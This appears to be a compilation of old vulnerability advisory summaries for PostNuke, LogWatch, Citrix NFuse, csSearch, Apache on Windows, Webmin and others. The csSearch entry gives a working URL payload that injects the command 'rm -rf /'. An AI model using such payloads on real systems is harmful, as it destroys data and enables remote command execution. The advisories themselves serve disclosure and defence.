A vulnerability has been reported in some versions of PostNuke. Reportedly, it is possible to force the script user.php to include arbitrary modules. These files may be hosted remotely and contain arbitrary code, which will then be executed by the vulnerable system.
LogWatch is a freely available, open source script for monitoring log files. It may be used with the Linux and Unix Operating systems. Upon execution, LogWatch creates a directory in /tmp. This directory uses the name logwatch.$pid, where $pid is the process id of the executing script. The LogWatch script does not check for an already existing directory or contents of the already existing directory. It is therefore possible for a local user to create a malicious logwatch.$pid directory using predicted process IDs, and place malicious files in the directory which will be executed.
Citrix NFuse is an application portal server meant to provide the functionality of any application on the server via a web browser. NFuse works in conjunction with a previously-installed webserver. NFuse is said to support almost any operating system, including Unix and Linux variants, as well as Microsoft Windows operating systems. A cross-site scripting vulnerability exists in Citrix NFuse. The launch.asp and launch.jsp scripts do not filter script code from URL parameters. An attacker may create a malicious link to one of these scripts which includes script code, which will be executed in the browser of an arbitrary web user who visits the link, in the security context of the site running Citrix NFuse. This may enable an attacker to steal cookie-based authentication credentials from legitimate users of the vulnerable software.
csSearch is a website search script, written in Perl. It is prone to an issue which may enable an attacker to execute Perl code with the privileges of the webserver process. For exploitation to be successful, the attacker must pass properly URL encoded Perl code in CGI parameters via a web request. For example, the classic 'rm -rf /' example would be as follows: csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`. Here's something a little more interesting, less than 300 bytes of code that turns csSearch into a remote web shell of sorts.
The Linux kernel d_path() function converts a dentry structure into an ASCII path name. The full path to the specified dentry is returned in a fixed length buffer of size PAGE_SIZE bytes. Reportedly, if a dentry structure is passed with a path which would exceed this length, an erroneous value is returned. The path which is returned has leading entries truncated, and no error is reported.
DCShop Beta is a freely available shopping cart system, written in Perl. It is possible to overwrite setup files (*.setup) by submitting attacker-supplied form data followed by a null character (%00). The attacker must use the POST method to submit data that is content-type multipart/form-data compliant.
Special characters (such as |) may not be filtered by the batch file handler when a web request is made for a batch file. As a result, a remote attacker may be able to execute arbitrary commands on the host running the vulnerable software. It should be noted that webservers on Windows operating systems normally run with SYSTEM privileges. The 2.0.x series of Apache for Microsoft Windows ships with a test batch file which may be exploited to execute arbitrary commands. Since this issue is in the batch file handler, any batch file which is accessible via the web is appropriate for the purposes of exploitation.
A vulnerability has been reported in some versions of PHP-Nuke. Reportedly, a maliciously constructed HTTP request will cause the index.php script to return an error message which includes the full path of the script. It has been suggested that this is the result of an insecure server configuration.
Webmin does not filter script code from output that may be displayed by the web interface, such as log files, etc. This may enable a local attacker, with write privileges to such files, to cause arbitrary script code to be executed by the root user. Additionally, an attacker who can contrive a way to inject malicious script code into other types of output displayed by the Webmin interface may also exploit this issue. This may enable the attacker to steal cookie-based authentication credentials from the root user, eventually resulting in an escalation of privileges for the local attacker.
It has been reported that the move_uploaded_file function lacks an open_basedir check. The effect of this issue is that this function may be used to perform file operations on directories outside of those specified by the open_basedir setting. This vulnerability may not be exploited to overwrite existing files.
Services By CQR